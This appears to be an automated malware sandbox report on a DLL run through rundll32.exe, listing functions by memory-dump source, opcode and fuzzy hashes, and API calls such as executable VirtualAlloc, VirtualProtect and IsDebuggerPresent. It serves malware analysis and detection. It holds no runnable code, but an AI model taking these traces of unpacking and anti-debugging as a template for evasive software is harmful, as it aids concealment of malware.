Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction ID: 9c719ea42f28bc01bba7f3b92057a9809e5ee463e3c6f43ca37e57740fcd214f
Opcode Fuzzy Hash: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction Fuzzy Hash: F0C1D0706087439FD314CF6DDA5471EBBE2AF95700F148A2DEAA58B361D731D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E7AD180, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eebcffa5d3dec0ee8ee4f633aeb20e6db57f75f5a67056125e00cad1d421f41e
Instruction ID: c30ceb14a0744ef4d6b533f1602690556f14a4e6d7a1fbf59d21f81b69fd920e
Opcode Fuzzy Hash: eebcffa5d3dec0ee8ee4f633aeb20e6db57f75f5a67056125e00cad1d421f41e
Instruction Fuzzy Hash: 22D1F23014D3E54AC325AF6A94503FFFEE55FE2208F188D7DAAD4532A2D5788604DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E7ADCA0, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b4b0132f1716d9d330779972ddd039648a5f9bf8c3fecf65c301793a73e151
Instruction ID: 9a7515e991cee5c411ddd4401b1edc90ada35445cc6a0f1ec379883ebdf507bb
Opcode Fuzzy Hash: c1b4b0132f1716d9d330779972ddd039648a5f9bf8c3fecf65c301793a73e151
Instruction Fuzzy Hash: 8EC1F42120C3914AC311AF7EA5902BFBEE15FE5109F188D7DE5D9432A2D678C584DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A9B10, Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction ID: 9655a7a71144edd7172cb22876a40f8634b90765f26a3e1985efdad97e8af814
Opcode Fuzzy Hash: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction Fuzzy Hash: 87A1F4719087069FD7009F9DED8064AF7A6FFD4304F04CB29E66807765E772A9718B81

Uniqueness

Uniqueness Score: -1.00%

Function 6E797564, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79ce9b7719db66a0124e860ea8dcc3d185f19dbba66413a0006a73dbc0a93ea6
Instruction ID: 0b1ad46328c58da87fdb74eb97c68e398e609d3c5e2aa20d3c511e03aff60a76
Opcode Fuzzy Hash: 79ce9b7719db66a0124e860ea8dcc3d185f19dbba66413a0006a73dbc0a93ea6
Instruction Fuzzy Hash: 96A1F7706087058BD790CE9DA6D0B9AB3E5FFC5314F14C93DC8588B3A9EB75A841EB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A71F0, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction ID: f4936b6b1bfbcb31480a750d7205a690308f583dc9594f1195c825ce6d7bf1d7
Opcode Fuzzy Hash: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction Fuzzy Hash: 50B1A9705087428FD305CF6D865032ABBE2BF85300F148B6DE9A58B3A9E775D916CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E79E0A0, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction ID: 1a895085b6b7281a874c02745c4100ff787e8d9376484c0e04d8dd02fe979da5
Opcode Fuzzy Hash: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction Fuzzy Hash: EEA1CDB19087168BD314CF69EA4061BB7E2FFC5710F14CA2DE8A49B364E731D805DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E79FDD0, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction ID: 48d622e24f43e5c4781795957850a897b1805e5fa63aefa52f836a000833b744
Opcode Fuzzy Hash: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction Fuzzy Hash: 7681CF716147028BD308CF69E64062BB3A3BFC5354F258B2DE5A4973A5EB71D8518B82

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A0220, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction ID: ff2e5e33771bf231e5a7729d459e38834ccfe23ea61b58baf2b6cd2aae383eeb
Opcode Fuzzy Hash: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction Fuzzy Hash: 80710A7161471387D7584EADC5A122A72E2BFC1750B298B3CEBA6872F5FB30D852C641

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A5CB0, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction ID: 17f744da58ff4661afdac55a9858538a0ca936aae5190de83a5334d82fe870c8
Opcode Fuzzy Hash: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction Fuzzy Hash: 3781257060C3428BE708CF6DE59031ABBE2BFD5310F188B6DE6A58B3A5D7359541CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6E7998DA, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction ID: 137fa9b598d11589dc17008c88a6f079df87807ebf852f02a34d7b903ff090cb
Opcode Fuzzy Hash: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction Fuzzy Hash: 9D616E71A047228EF714CEAAA66162672A6EFE5310B19C23DD8654F2B8FB31C801E751

Uniqueness

Uniqueness Score: -1.00%

Function 6E799E70, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction ID: c94a3809c5627ce4fdbb81f20e7e45298704175ef77ca9ca7aa1c24d1b9823de
Opcode Fuzzy Hash: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction Fuzzy Hash: 926189729057138BE7044F9DE6A1A2BB3A5AF95350B12433DE8654B3B0FB31D811D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E79A0D0, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction ID: d66d1bd9ad6f2d06cfdf8888d5c49cd3ad8ae46b855878d397554189ccc91916
Opcode Fuzzy Hash: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction Fuzzy Hash: 29615572D467228BD7048F99E6A1A2A73B0BF85750B12433CDD658B3B0EB32D851DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A1240, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction ID: a41aa5998e2872cf106136a44f671dc971ae6274af9e830567f75363b548e0d2
Opcode Fuzzy Hash: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction Fuzzy Hash: 6D612DA560979247F711CEED85D031A7BA76F96240F18C37DCE644F2AAD672C80AC7C1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A1020, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction ID: f5a029ac3a6cbb3a8cc8bd04244cbfad0cfc8e7c5169081f2b6c09a5bac380fe
Opcode Fuzzy Hash: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction Fuzzy Hash: 6B612CA16087925BF711CEEDD9D03177AA65F92204F18C378CE604B2AADA72CC09C782

Uniqueness

Uniqueness Score: -1.00%

Function 6E798CC0, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction ID: f13ed2131e58d879ad0725b08a990e2664f5e9e9f5dc1b30f31732ea9153288a
Opcode Fuzzy Hash: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction Fuzzy Hash: B5517C61A04B1386F7548FBEEAB0627B2A2FFD5750B19C23CD8658B3B8F7718411E641

Uniqueness

Uniqueness Score: -1.00%

Function 6E798AB0, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction ID: bb3e89f3a6681e32d460ad5d355eda7e41c73f7d23533cf61042b84e4c34bc46
Opcode Fuzzy Hash: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction Fuzzy Hash: 345189E1A05B1346F7584FAAEA9162732A2EFC1350B19C23CD9A18B3B4F771C410A741

Uniqueness

Uniqueness Score: -1.00%

Function 6E7988C0, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction ID: 5d77a5a3551eae72c3fffc1505aed683ffee20a45b5e0e63c4bdf837fe5fff70
Opcode Fuzzy Hash: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction Fuzzy Hash: 08515CA160471346F7188EAAEA6162772E6EFC1320B19C33CD9A54B3B5F7318411E652

Uniqueness

Uniqueness Score: -1.00%

Function 6E7ACEF8, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction ID: 20718b3e86e7f3338720d9af7a3f988b5bb66d8782251ff432d3386e87f28e85
Opcode Fuzzy Hash: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction Fuzzy Hash: 7A41A37320815669EB418EED97907EE37959F5175AF004B36FF60CD1B8E722C882DE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7996D0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction ID: ac83deb17b36681f6a166aa46650254104f15d2a1c6540977202535496185479
Opcode Fuzzy Hash: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction Fuzzy Hash: 45417A729042228BE7148FADE99162672A5EFA0350F15833DECA6873E0FB35C851D2D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E792980, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feab9fabbdf6593ef1b22668aedd181c5da8bd03283ce01774c5c8a65b565b30
Instruction ID: 1484ec8375bd1947178a5231dd341cc396e16bad62eb879f1be50b714edf2d47
Opcode Fuzzy Hash: feab9fabbdf6593ef1b22668aedd181c5da8bd03283ce01774c5c8a65b565b30
Instruction Fuzzy Hash: CC41C2311282499BD744EF94FE94BEA33ACAF50604F408C3CE8059B2B1EF75A905EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7ABE30, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction ID: 1af41191676729ca6b0c8990c1ba873f8ab9cb22a16e40fd52b78f97254c4e8b
Opcode Fuzzy Hash: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction Fuzzy Hash: 23F0E23420C58BAAFB414EFDCEA0B5632EC9F09295F110B71A720D51BCFB21E8249922

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7076 Parent PID: 7000 rundll32.exeCOMMON

Executed Functions

Function 6E8CBA72, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,000006CA,00003000,00000040,000006CA,6E8CB4C0), ref: 6E8CBB2F
VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000040,6E8CB520), ref: 6E8CBB66
VirtualAlloc.KERNEL32(00000000,0003C452,00003000,00000040), ref: 6E8CBBC6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E8CBBFC
VirtualProtect.KERNEL32(6E780000,00000000,00000004,6E8CBA51), ref: 6E8CBD01
VirtualProtect.KERNEL32(6E780000,00001000,00000004,6E8CBA51), ref: 6E8CBD28
VirtualProtect.KERNEL32(00000000,?,00000002,6E8CBA51), ref: 6E8CBDF5
VirtualProtect.KERNEL32(00000000,?,00000002,6E8CBA51,?), ref: 6E8CBE4B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E8CBE67

Memory Dump Source

Source File: 00000008.00000002.812407657.000000006E8CB000.00000040.00020000.sdmp, Offset: 6E8CB000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 623767ba2e3a7c7d0b172c65f64f1ac8c574a60b99b15513513a4157166d0342
Instruction ID: 0c93acc0c59369ececb9830ea750eff63e2ee291df518a6b98df87feac8ba64e
Opcode Fuzzy Hash: 623767ba2e3a7c7d0b172c65f64f1ac8c574a60b99b15513513a4157166d0342
Instruction Fuzzy Hash: 84D16972500A01EFDB518F94D880B9277A6FF89750B080D94ED299F35EDBBAA801DB74

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C7560, Relevance: 1.8, APIs: 1, Instructions: 259memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E7C67B0: RtlEnterCriticalSection.NTDLL(?), ref: 6E7C67BF

RtlAllocateHeap.NTDLL(6E8CA374,00000000,?), ref: 6E7C76F2

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: AllocateCriticalEnterHeapSection
String ID:
API String ID: 8947104-0
Opcode ID: 04b844bf4ed87caf4a2acb09e6b05470522a26a58fabb8df3a061ce3e8fe90e3
Instruction ID: ddfc7b10496965738c629a6aaa734a7ca7af6f3be95368cdd78cb66799ebd46b
Opcode Fuzzy Hash: 04b844bf4ed87caf4a2acb09e6b05470522a26a58fabb8df3a061ce3e8fe90e3
Instruction Fuzzy Hash: 19B16FB4900609DFDF04CFA8D984B9D77B9FB49B14F108529E919AB3D0DB74A940CF92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E7F8B60, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 602COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 6E7F8C99
OutputDebugStringW.KERNEL32(6E85EC48), ref: 6E7F8CA6
OutputDebugStringW.KERNEL32(6E85EC94), ref: 6E7F8CCE
OutputDebugStringW.KERNEL32(6E85ECB4), ref: 6E7F8CD9
OutputDebugStringW.KERNEL32(?), ref: 6E7F8CE6
OutputDebugStringW.KERNEL32(6E85DAFC), ref: 6E7F8CF1
__strftime_l.LIBCMTD ref: 6E7F8D4C
__aligned_msize.LIBCMTD ref: 6E7F8DCA
__invoke_watson_if_error.LIBCMTD ref: 6E7F8DD3
__aligned_msize.LIBCMTD ref: 6E7F8E26
__invoke_watson_if_error.LIBCMTD ref: 6E7F8E2F
__aligned_msize.LIBCMTD ref: 6E7F8E60
__invoke_watson_if_error.LIBCMTD ref: 6E7F8E69
__aligned_msize.LIBCMTD ref: 6E7F8EAD
__invoke_watson_if_error.LIBCMTD ref: 6E7F8EB6
__aligned_msize.LIBCMTD ref: 6E7F8EE5
__invoke_watson_if_error.LIBCMTD ref: 6E7F8EEE
__aligned_msize.LIBCMTD ref: 6E7F8FC5
__invoke_watson_if_error.LIBCMTD ref: 6E7F8FCE
__aligned_msize.LIBCMTD ref: 6E7F9001
__invoke_watson_if_error.LIBCMTD ref: 6E7F900A
__cftoe.LIBCMTD ref: 6E7F9043
__aligned_msize.LIBCMTD ref: 6E7F908A
__invoke_watson_if_error.LIBCMTD ref: 6E7F9093

Strings

P, xrefs: 6E7F935A

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$__aligned_msize$DebugOutputString$__cftoe__strftime_l
String ID: P
API String ID: 4201128107-3110715001
Opcode ID: 850ae194b589add770260e1b0b22aa2a6eec562bdd750ae42c464323178caff3
Instruction ID: a8dbf29935a887129befd8079e871c80218ded2866c2abae9d0f9fb4d5e99ad1
Opcode Fuzzy Hash: 850ae194b589add770260e1b0b22aa2a6eec562bdd750ae42c464323178caff3
Instruction Fuzzy Hash: 1032A470940618EFEBA0DFD4CD48FDA7378BB18705F0089E5E5496A390DB709A99CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F97B0, Relevance: 7.6, APIs: 5, Instructions: 116threadtimeCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,6E7F9B96,6E84E700,6E8CA5A0,6E807094,?,6E807094,6E8CA5A0,6E84E700,00012010), ref: 6E7F97C0
IsDebuggerPresent.KERNEL32(?,?,?,?,6E7F9B96,6E84E700,6E8CA5A0,6E807094,?,6E807094,6E8CA5A0,6E84E700,00012010), ref: 6E7F97FA

Part of subcall function 6E7F9A50: OutputDebugStringW.KERNEL32(?,?,6E7F97D9,00000000,?,?,?,?,6E7F9B96,6E84E700,6E8CA5A0,6E807094,?,6E807094,6E8CA5A0), ref: 6E7F9A5B

CreateThread.KERNEL32(00000000,00000000,6E7F99E0,?,00000000,00000000), ref: 6E7F9852
std::_Timevec::_Timevec.LIBCPMTD ref: 6E7F985C
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000), ref: 6E7F9894

Memory Dump Source

Source File: 00000008.00000002.812213024.000000006E7BD000.00000020.00020000.sdmp, Offset: 6E7BD000, based on PE: false

Similarity

API ID: DebuggerPresent$CreateDebugObjectOutputSingleStringThreadTimevecTimevec::_Waitstd::_
String ID:
